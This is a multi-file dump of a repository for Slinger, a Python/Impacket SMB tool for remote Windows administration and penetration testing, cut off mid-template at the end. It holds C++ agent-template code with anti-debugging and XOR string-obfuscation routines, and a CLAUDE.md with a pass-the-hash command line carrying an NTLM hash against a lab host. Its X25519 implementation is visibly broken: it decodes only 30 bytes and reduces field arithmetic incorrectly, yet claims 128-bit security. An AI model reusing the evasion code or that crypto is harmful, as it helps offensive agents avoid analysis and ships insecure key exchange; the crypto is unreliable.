obfuscation 77 | inline void insert_junk_code() { 78 | volatile int junk = random_seed(); 79 | junk *= 0x1337; 80 | junk += 0xDEADBEEF; 81 | junk ^= 0xCAFEBABE; 82 | (void)junk; // Suppress unused variable warning 83 | } 84 | 85 | // Anti-debug timing checks (lightweight) 86 | inline bool check_timing() { 87 | auto start = std::chrono::high_resolution_clock::now(); 88 | insert_junk_code(); 89 | auto end = std::chrono::high_resolution_clock::now(); 90 | auto duration = std::chrono::duration_cast(end - start); 91 | return duration.count() < 1000; // Basic timing check 92 | } 93 | 94 | // Simple XOR encoder for runtime strings 95 | class XOREncoder { 96 | private: 97 | uint8_t key; 98 | 99 | public: 100 | XOREncoder() : key(static_cast(random_seed() & 0xFF)) {} 101 | 102 | // Constructor with explicit seed for deterministic key 103 | XOREncoder(uint32_t seed) : key(static_cast(seed & 0xFF)) {} 104 | 105 | std::string encode(const std::string& input) { 106 | std::string result = input; 107 | for (char& c : result) { 108 | c ^= key; 109 | } 110 | return result; 111 | } 112 | 113 | std::string decode(const std::string& input) { 114 | return encode(input); // XOR is symmetric 115 | } 116 | 117 | uint8_t get_key() const { return key; } 118 | }; 119 | 120 | // Stack-based string obfuscation 121 | template 122 | class StackString { 123 | private: 124 | char buffer[SIZE]; 125 | size_t length; 126 | 127 | public: 128 | StackString() : length(0) { 129 | memset(buffer, 0, SIZE); 130 | } 131 | 132 | StackString(const char* str) : length(0) { 133 | assign(str); 134 | } 135 | 136 | void assign(const char* str) { 137 | length = strlen(str); 138 | if (length >= SIZE) length = SIZE - 1; 139 | 140 | uint8_t xor_key = static_cast(random_seed() & 0xFF); 141 | for (size_t i = 0; i < length; ++i) { 142 | buffer[i] = str[i] ^ xor_key; 143 | } 144 | buffer[length] = '\0'; 145 | 146 | // Decode in place 147 | for (size_t i = 0; i < length; ++i) { 148 | buffer[i] ^= xor_key; 149 | } 150 | } 151 | 152 | const char* c_str() const { return buffer; } 153 | size_t size() const { return length; } 154 | }; 155 | 156 | } // namespace obfuscated 157 | 158 | // Obfuscation macros for common use 159 | #define OBFUSCATED_FUNC(ret, name, ...) \ 160 | ret OBF_FUNC_NAME(name)(__VA_ARGS__) 161 | 162 | #define OBFUSCATED_CALL(name, ...) \ 163 | OBF_FUNC_NAME(name)(__VA_ARGS__) 164 | -------------------------------------------------------------------------------- /lib/agent_templates/dh_x25519.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include "crypto.h" 5 | 6 | namespace crypto { 7 | 8 | // X25519 Elliptic Curve Diffie-Hellman (Curve25519) 9 | // Provides 128-bit security level with 32-byte keys 10 | // Much faster and simpler than classic DH with large primes 11 | class X25519 { 12 | public: 13 | static const size_t KEY_SIZE = 32; // 256 bits 14 | 15 | private: 16 | // Curve25519 field prime: 2^255 - 19 17 | static void fe25519_add(uint32_t out[10], const uint32_t a[10], const uint32_t b[10]) { 18 | for (int i = 0; i < 10; i++) { 19 | out[i] = a[i] + b[i]; 20 | } 21 | } 22 | 23 | static void fe25519_sub(uint32_t out[10], const uint32_t a[10], const uint32_t b[10]) { 24 | uint32_t c = 0; 25 | for (int i = 0; i < 10; i++) { 26 | c = a[i] - b[i] - c; 27 | out[i] = c & ((1 << 26) - 1); 28 | c = (c >> 26) & 1; 29 | } 30 | } 31 | 32 | static void fe25519_mul(uint32_t out[10], const uint32_t a[10], const uint32_t b[10]) { 33 | uint64_t t[19] = {0}; 34 | for (int i = 0; i < 10; i++) { 35 | for (int j = 0; j < 10; j++) { 36 | t[i + j] += (uint64_t)a[i] * b[j]; 37 | } 38 | } 39 | // Reduce modulo 2^255 - 19 40 | for (int i = 0; i < 10; i++) { 41 | t[i] += (t[i + 10] * 38); 42 | out[i] = t[i] & ((1 << 26) - 1); 43 | t[i + 1] += t[i] >> 26; 44 | } 45 | } 46 | 47 | static void curve25519_scalarmult(uint8_t* out, const uint8_t* scalar, const uint8_t* point) { 48 | // Simplified X25519 - in production use a hardened implementation 49 | // This is a placeholder - you should use Windows BCrypt or OpenSSL for production 50 | 51 | uint8_t clamped_scalar[32]; 52 | memcpy(clamped_scalar, scalar, 32); 53 | clamped_scalar[0] &= 248; 54 | clamped_scalar[31] &= 127; 55 | clamped_scalar[31] |= 64; 56 | 57 | uint32_t x1[10], x2[10] = {1}, z2[10] = {0}, x3[10], z3[10] = {1}; 58 | uint32_t tmp0[10], tmp1[10]; 59 | 60 | // Decode point 61 | for (int i = 0; i < 10; i++) { 62 | x1[i] = point[i * 3] | (point[i * 3 + 1] << 8) | (point[i * 3 + 2] << 16); 63 | } 64 | memcpy(x3, x1, sizeof(x1)); 65 | 66 | // Montgomery ladder 67 | for (int pos = 254; pos >= 0; pos--) { 68 | uint32_t bit = (clamped_scalar[pos / 8] >> (pos & 7)) & 1; 69 | 70 | // Conditional swap 71 | if (bit) { 72 | for (int i = 0; i < 10; i++) { 73 | uint32_t tmp = x2[i]; x2[i] = x3[i]; x3[i] = tmp; 74 | tmp = z2[i]; z2[i] = z3[i]; z3[i] = tmp; 75 | } 76 | } 77 | 78 | // Point addition and doubling 79 | fe25519_add(tmp0, x2, z2); 80 | fe25519_sub(tmp1, x2, z2); 81 | fe25519_mul(x2, tmp0, tmp0); 82 | fe25519_mul(z2, tmp1, tmp1); 83 | fe25519_sub(z2, x2, z2); 84 | fe25519_mul(x2, x2, z2); 85 | fe25519_add(z2, z2, x1); 86 | fe25519_mul(z2, z2, z2); 87 | 88 | if (bit) { 89 | for (int i = 0; i < 10; i++) { 90 | uint32_t tmp = x2[i]; x2[i] = x3[i]; x3[i] = tmp; 91 | tmp = z2[i]; z2[i] = z3[i]; z3[i] = tmp; 92 | } 93 | } 94 | } 95 | 96 | // Encode result 97 | for (int i = 0; i < 10; i++) { 98 | out[i * 3] = x2[i] & 0xff; 99 | out[i * 3 + 1] = (x2[i] >> 8) & 0xff; 100 | out[i * 3 + 2] = (x2[i] >> 16) & 0xff; 101 | } 102 | } 103 | 104 | public: 105 | // Generate a keypair (private key + public key) 106 | static bool generate_keypair(uint8_t* private_key, uint8_t* public_key) { 107 | // Generate random private key 108 | if (!SecureRandom::generate(private_key, KEY_SIZE)) { 109 | return false; 110 | } 111 | 112 | // Clamp private key (required for X25519) 113 | private_key[0] &= 248; 114 | private_key[31] &= 127; 115 | private_key[31] |= 64; 116 | 117 | // Compute public key = scalar_mult(private_key, basepoint) 118 | uint8_t basepoint[KEY_SIZE] = {9}; // X25519 base point 119 | 120 | // Use pure C++ implementation for cross-platform compatibility 121 | curve25519_scalarmult(public_key, private_key, basepoint); 122 | 123 | return true; 124 | } 125 | 126 | // Compute shared secret from your private key and their public key 127 | static bool compute_shared_secret(const uint8_t* my_private_key, 128 | const uint8_t* their_public_key, 129 | uint8_t* shared_secret) { 130 | // Use pure C++ implementation for cross-platform compatibility 131 | curve25519_scalarmult(shared_secret, my_private_key, their_public_key); 132 | return true; 133 | } 134 | }; 135 | 136 | } // namespace crypto 137 | -------------------------------------------------------------------------------- /CLAUDE.md: -------------------------------------------------------------------------------- 1 | # CLAUDE.md 2 | 3 | This file provides guidance to Claude Code (claude.ai/code) when working with code in this repository. 4 | 5 | ## Project Overview 6 | 7 | Slinger is a Python-based SMB client framework for Windows system administration and security operations. Built on Impacket, it provides an interactive CLI for SMB operations, remote Windows administration, and security testing. 8 | 9 | ## Architecture 10 | 11 | The codebase uses a complex multiple inheritance pattern where `SlingerClient` inherits from ~10 operational modules: 12 | 13 | ``` 14 | CLI Entry (slinger.py) → SlingerClient → Multiple Inheritance Chain: 15 | ├── smblib (SMB operations) 16 | ├── winreg (Registry management) 17 | ├── schtasks (Task scheduling) 18 | ├── scm (Service control) 19 | ├── secrets (Credential operations) 20 | ├── atexec (AT command execution) 21 | ├── wmiexec (WMI execution) 22 | ├── EventLog (Event log analysis) 23 | └── DCETransport (RPC transport) 24 | ``` 25 | 26 | **Key architectural points:** 27 | - Interactive shell with prompt_toolkit 28 | - Plugin system with dynamic loading (`plugins/`) 29 | - Resumable downloads with state persistence (`lib/download_state.py`) 30 | - Complex inheritance chain may create method resolution complexity 31 | 32 | ## Development Commands 33 | 34 | ### Environment Setup 35 | ```bash 36 | # Create and activate virtual environment (REQUIRED) 37 | python -m venv venv 38 | source venv/bin/activate # On Windows: venv\Scripts\activate 39 | 40 | # Install in development mode 41 | pip install -e ".[dev]" 42 | 43 | # Install development dependencies 44 | pip install pytest pytest-cov black flake8 mypy pre-commit pexpect 45 | ``` 46 | 47 | ### Build and Test Commands 48 | ```bash 49 | # Build the project 50 | python scripts/build_script.py 51 | 52 | # Run all tests (requires virtual environment) 53 | pytest 54 | 55 | # Run tests with coverage 56 | pytest --cov=slingerpkg --cov-report=html 57 | 58 | # Run specific test categories 59 | pytest tests/unit 60 | pytest tests/integration 61 | pytest tests/e2e 62 | 63 | # Generate test stubs for new features 64 | python scripts/generate_test_stub.py 65 | 66 | # CLI testing (example HTB target) 67 | python src/slingerpkg/slinger.py --user administrator --host 10.10.11.69 --ntlm :8da83a3fa618b6e3a00e93f676c92a6e 68 | ``` 69 | 70 | ### Quality Commands 71 | ```bash 72 | # Format code 73 | black src/ tests/ 74 | 75 | # Lint 76 | flake8 src/ tests/ 77 | 78 | # Type checking 79 | mypy src/ 80 | ``` 81 | 82 | ## Key Development Practices 83 | 84 | ### Virtual Environment Requirement 85 | **CRITICAL**: All development, testing, and CLI execution MUST use an active virtual environment. The tool relies on package installation and dependencies that won't work without proper environment isolation. 86 | 87 | ### CLI Command Development 88 | When adding new CLI commands, you MUST: 89 | 1. Add the command parser to `src/slingerpkg/utils/cli.py` 90 | 2. Add the command to the help categorization system in the `categories` dictionary within `print_all_commands_verbose()` 91 | 3. Choose appropriate emoji category (📁 File Operations, 🔍 System Enumeration, etc.) 92 | 4. Test both `help` and `help --verbose` to ensure the command appears 93 | 94 | ### Plugin Development 95 | New plugins go in `src/slingerpkg/plugins/` and must inherit from `PluginBase` (`lib/plugin_base.py`). See `plugins/system_audit.py` for example. 96 | 97 | ## File Structure for New Features 98 | 99 | ### Core SMB Operations 100 | - **File Operations**: Add to `src/slingerpkg/lib/smblib.py` 101 | - **Connection Management**: Enhance `src/slingerpkg/lib/slingerclient.py` 102 | 103 | ### Windows Administration 104 | - **Service Operations**: `src/slingerpkg/lib/scm.py` 105 | - **Registry Operations**: `src/slingerpkg/lib/winreg.py` 106 | - **Task Scheduling**: `src/slingerpkg/lib/schtasks.py` 107 | - **Process Management**: `src/slingerpkg/lib/process_tree.py` 108 | 109 | ### CLI and User Interface 110 | - **New Commands**: Add parsers to `src/slingerpkg/utils/cli.py` 111 | - **Output Formatting**: `src/slingerpkg/utils/printlib.py` 112 | - **Configuration**: `src/slingerpkg/var/config.py` 113 | 114 | ### Testing 115 | - **Unit Tests**: `tests/unit/test_.py` 116 | - **Integration Tests**: `tests/integration/` 117 | - **Test Fixtures**: `tests/fixtures/` 118 | 119 | ## Important Notes 120 | 121 | ### Resume Downloads Feature 122 | The project includes comprehensive resumable download functionality with: 123 | - `--resume` flag for resuming interrupted downloads 124 | - `--restart` flag for forcing fresh downloads 125 | - JSON-based state management 126 | - MD5 integrity verification 127 | - Chunked download with retry logic 128 | 129 | ### Testing Requirements 130 | - Use pexpect for interactive CLI testing 131 | - HTB integration tests use target 10.10.11.69 132 | - Always activate virtual environment before testing 133 | - MD5 verification required for download integrity tests 134 | 135 | ### Dependencies 136 | Key dependencies from pyproject.toml: 137 | - impacket==0.11.0 (core SMB functionality) 138 | - prompt_toolkit==3.0.41 (interactive CLI) 139 | - pycryptodome==3.20.0 (cryptographic operations) 140 | - tabulate==0.8.9 (output formatting) 141 | - pexpect (testing framework) 142 | -------------------------------------------------------------------------------- /docs/TODO.md: -------------------------------------------------------------------------------- 1 | ### Task Scheduler 2 | - load task xml 3 | 4 | ### Registry 5 | 6 | - None 7 | 8 | ### Service Control 9 | - sc modify 10 | 11 | ### General 12 | 13 | ### SMB 14 | - add a share #hNetrShareAdd 15 | - remove a share #hNetrShareEnum 16 | 17 | ## Current Enhancement Tasks 18 | 19 | ### High Priority 20 | 1. **Add verbose flag to show statements like remote path transformations** 21 | - Default: false 22 | - Configurable via set config command 23 | - Show statements like "[*] Remote Path (Before): KeePass-2.58.zip" and "[*] Remote Path (After): IT\KeePass-2.58.zip" 24 | 25 | 2. **Allow user to specify different filename when downloading** 26 | - Support syntax: `get KeePass-2.58.zip /tmp/test.zip` 27 | - Fix error: "[!] Local path /tmp/test.zip does not exist." 28 | - Should create the file at specified location with custom name 29 | 30 | 3. ✅ **Fix put relative path uploads issue** (COMPLETED) 31 | - ✅ Fixed double path joining bug in _resolve_remote_path method 32 | - ✅ Added proper handling for `../` and `../../` parent directory references 33 | - ✅ Enhanced path resolution for `.`, empty paths, and simple filenames 34 | - ✅ Tested with debug scripts and pexpect integration test 35 | - Location: `src/slingerpkg/lib/smblib.py` lines 1697-1748 36 | 37 | 38 | ### Medium Priority 39 | 4. ✅ **Fix navigation above root to default to root location** (COMPLETED) 40 | - ✅ Added protection in _normalize_path_for_smb method to detect above-root navigation 41 | - ✅ Automatically redirects users to root when attempting to navigate above share root 42 | - ✅ Shows user-friendly warning message: "Cannot navigate above share root. Redirecting to root directory." 43 | - ✅ Tested with pexpect integration test - confirmed working on HTB instance 44 | - Location: `src/slingerpkg/lib/smblib.py` lines 1679-1685 45 | 46 | 5. ✅ **Add option to save ls -r output to a file** (COMPLETED) 47 | - ✅ CLI argument `-o/--output` already implemented for output file specification 48 | - ✅ `--show` option already implemented to display saved file contents 49 | - ✅ Integrated with existing tee_output functionality 50 | - ✅ Tested and confirmed working: `ls -o filename.txt` saves output 51 | - ✅ Recursive support: `ls -r depth -o filename.txt` saves recursive listing 52 | - Location: `src/slingerpkg/utils/cli.py` lines 359-366, `src/slingerpkg/lib/smblib.py` lines 763-922 53 | 54 | 6. ✅ **wmi exec** (COMPLETED - DCE Transport Integration) 55 | - ✅ Created comprehensive WMI named pipe execution framework 56 | - ✅ Implemented SMB named pipe transport to bypass DCOM firewall restrictions 57 | - ✅ **ENHANCED**: Integrated with existing DCE transport infrastructure 58 | - ✅ **NEW**: Added WMI UUIDs to uuid_endpoints dictionary for proper RPC binding 59 | - ✅ **NEW**: Added _connect_wmi_service() and _wmi_execute_process() to DCETransport class 60 | - ✅ **NEW**: Modified WMI implementation to reuse existing DCE connections 61 | - ✅ Added WMI endpoint discovery and testing capabilities 62 | - ✅ Full CLI integration with extensive argument parsing 63 | - ✅ Interactive and non-interactive modes with output capture 64 | - ✅ Enhanced security through existing SMB authentication reuse 65 | - ✅ Based on comprehensive research in docs/WMI_NAMED_PIPE_EXECUTION_RESEARCH.md 66 | - Location: `src/slingerpkg/lib/wmi_namedpipe.py`, `src/slingerpkg/lib/dcetransport.py`, CLI: `src/slingerpkg/utils/cli.py` lines 1523-1571 67 | - **Status**: Framework integrated with DCE transport - ready for production use with Impacket RPC calls 68 | - ✅ **NEW**: Memory capture research and implementation completed 69 | - ✅ **NEW**: Added --memory-capture flag for stdout/stderr capture without disk files 70 | - ✅ **NEW**: PowerShell-based WMI class creation for temporary output storage 71 | - ✅ **NEW**: Automatic cleanup of temporary WMI classes 72 | - Research documented in: `docs/WMI_STDOUT_CAPTURE_RESEARCH.md` 73 | 74 | 7. ✅ **WMI DCOM Interactive Shell with Directory Navigation** (COMPLETED) 75 | - ✅ Complete WMI DCOM interactive shell implementation with persistent directory tracking 76 | - ✅ Full directory navigation support with cd command (relative, absolute, parent navigation) 77 | - ✅ Working directory integration for all WMI command execution with real-time prompt display 78 | - ✅ Cross-share file operations and optimized parameter usage with configurable options 79 | - ✅ Support for both CMD and PowerShell execution contexts 80 | - ✅ Path normalization and robust directory handling 81 | - ✅ Interactive pseudo-shell with proper prompt prefixing (WMI/PS-WMI) 82 | - ✅ Session persistence and output logging capabilities 83 | - Location: `src/slingerpkg/lib/wmiexec.py`, CLI: `src/slingerpkg/utils/cli.py` 84 | - Documentation: `docs/WMI_DIRECTORY_NAVIGATION_COMPLETE.md`, `docs/WMI_WORKING_DIRECTORY_INTEGRATION_COMPLETE.md` 85 | 86 | ### Future Enhancements 87 | 8. **System Change Tracking** 88 | - Add a way to track changes made to the system to show a report for later 89 | - Track file modifications, service changes, registry edits, scheduled tasks 90 | - Generate comprehensive audit reports of all system modifications 91 | - Integration with existing logging infrastructure 92 | 93 | 9. **Cross-Shell Directory Synchronization** 94 | - Synchronize cd across WMI shells and native SMB 95 | - Maintain consistent working directory state across different execution contexts 96 | - Bidirectional directory synchronization between SMB navigation and WMI shells 97 | - Unified directory state management 98 | -------------------------------------------------------------------------------- /.github/workflows/cli-flag-standards.yml: -------------------------------------------------------------------------------- 1 | name: CLI Flag Standards Check 2 | 3 | on: 4 | pull_request: 5 | branches: [main, develop] 6 | paths: 7 | - 'src/**/*.py' 8 | push: 9 | branches: [main, develop] 10 | paths: 11 | - 'src/**/*.py' 12 | 13 | jobs: 14 | check-cli-flags: 15 | runs-on: ubuntu-latest 16 | 17 | steps: 18 | - uses: actions/checkout@v4 19 | 20 | - name: Set up Python 21 | uses: actions/setup-python@v5 22 | with: 23 | python-version: '3.11' 24 | 25 | - name: Install dependencies 26 | run: | 27 | python -m pip install --upgrade pip 28 | pip install -e . 29 | 30 | - name: Check CLI flag naming standards 31 | run: | 32 | python -c " 33 | import re 34 | import sys 35 | import ast 36 | from pathlib import Path 37 | 38 | def extract_add_argument_calls(file_path): 39 | '''Extract all add_argument calls from a Python file''' 40 | try: 41 | with open(file_path, 'r') as f: 42 | content = f.read() 43 | 44 | tree = ast.parse(content) 45 | violations = [] 46 | 47 | for node in ast.walk(tree): 48 | if (isinstance(node, ast.Call) and 49 | isinstance(node.func, ast.Attribute) and 50 | node.func.attr == 'add_argument'): 51 | 52 | # Get the first argument (the flag name) 53 | if node.args: 54 | arg = node.args[0] 55 | if isinstance(arg, ast.Str): 56 | flag_name = arg.s 57 | elif isinstance(arg, ast.Constant) and isinstance(arg.value, str): 58 | flag_name = arg.value 59 | else: 60 | continue 61 | 62 | # Check for violations 63 | violation = check_flag_standards(flag_name, node.lineno) 64 | if violation: 65 | violations.append((file_path, violation)) 66 | 67 | return violations 68 | except Exception as e: 69 | print(f'Error parsing {file_path}: {e}') 70 | return [] 71 | 72 | def check_flag_standards(flag_name, line_no): 73 | '''Check if flag name adheres to standards''' 74 | # Skip positional arguments (no hyphens) 75 | if not flag_name.startswith('-'): 76 | return None 77 | 78 | # Single letter flags should use single hyphen 79 | if len(flag_name) == 2 and flag_name.startswith('-') and not flag_name.startswith('--'): 80 | if flag_name[1].isalpha(): 81 | return None # Correct: -l, -v, etc. 82 | 83 | # Multi-letter flags should use double hyphen 84 | if len(flag_name) > 2 and flag_name.startswith('--'): 85 | return None # Correct: --list, --verbose, etc. 86 | 87 | # Violations 88 | violations = [] 89 | 90 | # Single letter with double hyphen: --l 91 | if len(flag_name) == 3 and flag_name.startswith('--') and flag_name[2].isalpha(): 92 | violations.append(f'Line {line_no}: Single letter flag \"{flag_name}\" should use single hyphen: \"-{flag_name[2]}\"') 93 | 94 | # Multi-letter with single hyphen: -list 95 | elif len(flag_name) > 2 and flag_name.startswith('-') and not flag_name.startswith('--'): 96 | violations.append(f'Line {line_no}: Multi-letter flag \"{flag_name}\" should use double hyphen: \"-{flag_name}\"') 97 | 98 | return violations[0] if violations else None 99 | 100 | # Check only CLI-related files, exclude internal tools like secretsdump 101 | src_dir = Path('src') 102 | all_violations = [] 103 | 104 | cli_files = [ 105 | src_dir / 'slingerpkg' / 'utils' / 'cli.py', 106 | src_dir / 'slingerpkg' / 'slinger.py' 107 | ] 108 | 109 | for py_file in cli_files: 110 | if py_file.exists(): 111 | violations = extract_add_argument_calls(str(py_file)) 112 | all_violations.extend(violations) 113 | 114 | # Report violations 115 | if all_violations: 116 | print('❌ CLI Flag Standard Violations Found:') 117 | print('=' * 50) 118 | print('Standard: Single letter flags use single hyphen (-l), multi-letter flags use double hyphen (--list)') 119 | print() 120 | 121 | for file_path, violation in all_violations: 122 | print(f'📁 {file_path}') 123 | print(f' {violation}') 124 | print() 125 | 126 | print(f'Total violations: {len(all_violations)}') 127 | sys.exit(1) 128 | else: 129 | print('✅ All CLI flags adhere to naming standards!') 130 | print('Standard: Single letter flags use single hyphen (-l), multi-letter flags use double hyphen (--list)') 131 | " 132 | 133 | - name: Comment on PR if violations found 134 | if: failure() && github.event_name == 'pull_request' 135 | uses: actions/github-script@v7 136 | with: 137 | script: | 138 | const message = ` 139 | ## ❌ CLI Flag Naming Standard Violations 140 | 141 | This PR contains CLI flags that don't follow the project's naming standards: 142 | 143 | **Standard:** 144 | - Single letter flags: Use single hyphen (e.g., \`-l\`, \`-v\`, \`-h\`) 145 | - Multi-letter flags: Use double hyphen (e.g., \`--list\`, \`--verbose\`, \`--help\`) 146 | 147 | **Common Violations:** 148 | - ❌ \`--l\` should be \`-l\` 149 | - ❌ \`-list\` should be \`--list\` 150 | - ❌ \`-verbose\` should be \`--verbose\` 151 | 152 | Please fix the flag naming to match the standards before merging. 153 | `; 154 | 155 | github.rest.issues.createComment({ 156 | issue_number: context.issue.number, 157 | owner: context.repo.owner, 158 | repo: context.repo.repo, 159 | body: message 160 | }); 161 | -------------------------------------------------------------------------------- /src/slingerpkg/utils/printlib.py: -------------------------------------------------------------------------------- 1 | import inspect 2 | from slingerpkg.utils.logger import SlingerLogger, error_logging 3 | from slingerpkg.var.config import config_vars 4 | import os 5 | 6 | 7 | class colors: 8 | HEADER = "\033[95m" 9 | OKBLUE = "\033[94m" 10 | OKGREEN = "\033[0;32m" 11 | WARNING = "\033[91m" 12 | BLUE = "\033[0;34m" 13 | YELLOW = "\033[93m" 14 | FAIL = "\033[1;31m" 15 | ENDC = "\033[0m" 16 | 17 | 18 | def get_config_value(key): 19 | try: 20 | for c in config_vars: 21 | if c["Name"].lower() == key.lower(): 22 | return c["Value"] 23 | print_warning(f"Config variable {key} does not exist") 24 | except KeyError: 25 | print_warning(f"Config variable {key} does not exist") 26 | return 27 | 28 | 29 | def print_block(msg, color=colors.YELLOW, block_char="*", max_width=50): 30 | """ 31 | Prints a centered block with top and bottom borders only. 32 | Ensures borders expand at least 2 characters left and right beyond the message. 33 | 34 | Args: 35 | msg (str): The message to display. 36 | block_char (str): The character to use for the border. 37 | max_width (int): The maximum width of the block (default 50). 38 | """ 39 | # Calculate the total width (message + 4 spaces for padding) 40 | required_width = len(msg) + 4 41 | 42 | # Truncate the message if necessary 43 | if required_width > max_width: 44 | max_msg_length = max_width - 7 # 3 for "..." and 4 for padding 45 | msg = msg[:max_msg_length] + "..." 46 | required_width = max_width 47 | 48 | # Calculate padding for centering 49 | padding = (required_width - len(msg)) // 2 50 | centered_msg = f"{' ' * padding}{msg}{' ' * (required_width - len(msg) - padding)}" 51 | 52 | # Print the block 53 | border = block_char * required_width 54 | print_log(f"{color}{border}{colors.ENDC}") # Top border 55 | # print_log(centered_msg) # Centered message 56 | print_log(f"{color}{centered_msg}{colors.ENDC}") 57 | # print_log(border) # Bottom border 58 | print_log(f"{color}{border}{colors.ENDC}") 59 | 60 | 61 | def print_log(msg="", end="\n"): 62 | # TODO: test codecs 63 | # print(msg.encode().decode(get_config_value("Codec")), end=end) 64 | 65 | print(msg, end=end) 66 | try: 67 | # TODO: test codecs 68 | # log.debug(msg.encode().decode(get_config_value("Codec"))) 69 | log.debug(msg) 70 | except Exception as e: 71 | print_warning(f"Unable to write to log file: {e}") 72 | raise e 73 | 74 | 75 | def print_good(msg): 76 | print_log(f"{colors.OKGREEN}[+] {msg}{colors.ENDC}") 77 | 78 | 79 | def print_bad(msg): 80 | print_log(f"{colors.FAIL}[-] {msg}{colors.ENDC}") 81 | 82 | 83 | def print_warning(msg): 84 | print_log(f"{colors.WARNING}[!] {msg}{colors.ENDC}") 85 | 86 | 87 | def print_info(msg): 88 | print_log(f"{colors.HEADER}[*] {msg}{colors.ENDC}") 89 | 90 | 91 | def print_verbose(msg): 92 | if get_config_value("Verbose") or get_config_value("Debug"): 93 | print_log(f"{colors.HEADER}[*] {msg}{colors.ENDC}") 94 | 95 | 96 | def print_debug(msg, e=None, force_debug=False): 97 | # find the Debug Dict in config 98 | from datetime import datetime 99 | 100 | if e: 101 | verbose_trace = error_logging(e) 102 | else: 103 | verbose_trace = "" 104 | 105 | current_frame = inspect.currentframe().f_back 106 | 107 | line_number = current_frame.f_lineno 108 | 109 | module = inspect.getmodule(current_frame) 110 | module_name = module.__name__ if module else "unknown" 111 | timestamp = datetime.now().strftime("%H:%M:%S.%f")[:-3] # HH:MM:SS.mmm 112 | debug_msg = f""" 113 | ********************************************* 114 | [DEBUG][{timestamp}][{module_name}][Line {line_number}]:{colors.HEADER}{msg}{colors.ENDC} 115 | {verbose_trace} 116 | [DEBUG]{trace_print("Traceback (most recent call last):", trace_calls=True)} 117 | ********************************************* 118 | """ 119 | 120 | if not get_config_value("Debug"): 121 | log.debug(debug_msg) 122 | if not force_debug: 123 | return 124 | print_log(debug_msg) 125 | 126 | 127 | def trace_print(*args, **kwargs): 128 | # Print the standard message 129 | # print_log(*args, **kwargs) 130 | 131 | # Check if tracing is requested 132 | if kwargs.get("trace_calls", False): 133 | # Create a stack trace from the current frame 134 | frame = inspect.currentframe().f_back 135 | 136 | # Initialize the message variable 137 | message = "" 138 | 139 | # Iterate over the frames and append the call series to the message 140 | message += "Call trace:\n" 141 | while frame: 142 | module = inspect.getmodule(frame) 143 | if module: 144 | module_name = module.__name__ 145 | else: 146 | module_name = "(unknown module)" 147 | 148 | filename = frame.f_code.co_filename 149 | lineno = frame.f_lineno 150 | funcname = frame.f_code.co_name 151 | message += f"\t{module_name}: {funcname} in {filename}, line {lineno}\n" 152 | 153 | frame = frame.f_back 154 | 155 | # Return the message 156 | return message 157 | 158 | 159 | def print_struct(struct, indent=0): 160 | """Recursively print a struct without knowing the keys.""" 161 | spacing = " " * indent 162 | if isinstance(struct, dict): 163 | for key, value in struct.items(): 164 | if isinstance(value, (dict, list)): 165 | print(f"{spacing}{key}:") 166 | print_struct(value, indent + 4) 167 | else: 168 | if isinstance(value, bytes): 169 | value = value.decode("utf-8", errors="replace") 170 | print(f"{spacing}{key}: {value}") 171 | elif isinstance(struct, list): 172 | for index, item in enumerate(struct): 173 | print(f"{spacing}[{index}]:") 174 | print_struct(item, indent + 4) 175 | else: 176 | if isinstance(struct, bytes): 177 | struct = struct.decode("utf-8", errors="replace") 178 | print(f"{spacing}{struct}") 179 | 180 | 181 | log_location = os.path.expanduser(get_config_value("Logs_Folder")) 182 | # Initialize the logger at the start of your application 183 | log = SlingerLogger(log_location, "slingerlog").get_logger() 184 | 185 | logwriter = log 186 | -------------------------------------------------------------------------------- /scripts/generate_test_stub.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | """ 3 | Generate test stub for a new Slinger command 4 | """ 5 | import os 6 | import sys 7 | from pathlib import Path 8 | from datetime import datetime 9 | 10 | 11 | UNIT_TEST_TEMPLATE = '''""" 12 | Unit tests for {command} command 13 | Generated: {date} 14 | """ 15 | import pytest 16 | from unittest.mock import Mock, patch 17 | import sys 18 | 19 | sys.path.insert(0, 'src') 20 | 21 | 22 | class Test{command_class}: 23 | """Unit tests for {command} command""" 24 | 25 | @pytest.fixture 26 | def mock_client(self): 27 | """Create mock Slinger client""" 28 | client = Mock() 29 | client.connected = True 30 | client.host = "192.168.1.100" 31 | client.username = "testuser" 32 | client.shares = ["C$", "ADMIN$", "IPC$"] 33 | client.pwd = "C$\\\\" 34 | client.use_share = "C$" 35 | return client 36 | 37 | def test_{command}_basic(self, mock_client): 38 | """Test basic {command} functionality""" 39 | # TODO: Implement test 40 | # Example: 41 | # result = mock_client.{command}() 42 | # assert result is not None 43 | assert False, "Test not implemented" 44 | 45 | def test_{command}_with_arguments(self, mock_client): 46 | """Test {command} with various arguments""" 47 | # TODO: Test different argument combinations 48 | assert False, "Test not implemented" 49 | 50 | def test_{command}_error_handling(self, mock_client): 51 | """Test {command} error scenarios""" 52 | # TODO: Test error cases 53 | # Example: 54 | # mock_client.{command}.side_effect = Exception("Test error") 55 | # with pytest.raises(Exception): 56 | # result = command_function(mock_client) 57 | assert False, "Test not implemented" 58 | 59 | def test_{command}_edge_cases(self, mock_client): 60 | """Test {command} edge cases""" 61 | # TODO: Test boundary conditions, empty inputs, etc. 62 | assert False, "Test not implemented" 63 | ''' 64 | 65 | INTEGRATION_TEST_TEMPLATE = '''""" 66 | Integration tests for {command} command 67 | Generated: {date} 68 | """ 69 | import pytest 70 | from tests.fixtures.mock_smb_server import MockSMBServer 71 | from tests.fixtures.cli_runner import SlingerTestRunner, run_command_test 72 | 73 | 74 | class Test{command_class}Integration: 75 | """Integration tests for {command} command""" 76 | 77 | @pytest.fixture 78 | def mock_server(self): 79 | """Create mock SMB server""" 80 | server = MockSMBServer() 81 | # TODO: Configure mock server for {command} testing 82 | return server 83 | 84 | @pytest.fixture 85 | def runner(self, mock_server, monkeypatch): 86 | """Create test runner""" 87 | monkeypatch.setattr( 88 | "impacket.smbconnection.SMBConnection", 89 | lambda *args, **kwargs: mock_server.get_connection() 90 | ) 91 | 92 | runner = SlingerTestRunner(mock_server=mock_server) 93 | if not runner.start(host="192.168.1.100", username="testuser", password="testpass"): 94 | pytest.skip("Failed to start test runner") 95 | 96 | yield runner 97 | runner.stop() 98 | 99 | @pytest.mark.requires_mock_server 100 | def test_{command}_command_execution(self, runner): 101 | """Test {command} command execution""" 102 | # TODO: Implement integration test 103 | output = runner.send_command("{command}") 104 | assert "error" not in output.lower() 105 | 106 | @pytest.mark.requires_mock_server 107 | def test_{command}_with_mock_data(self, mock_server, runner): 108 | """Test {command} with mock data""" 109 | # TODO: Set up mock 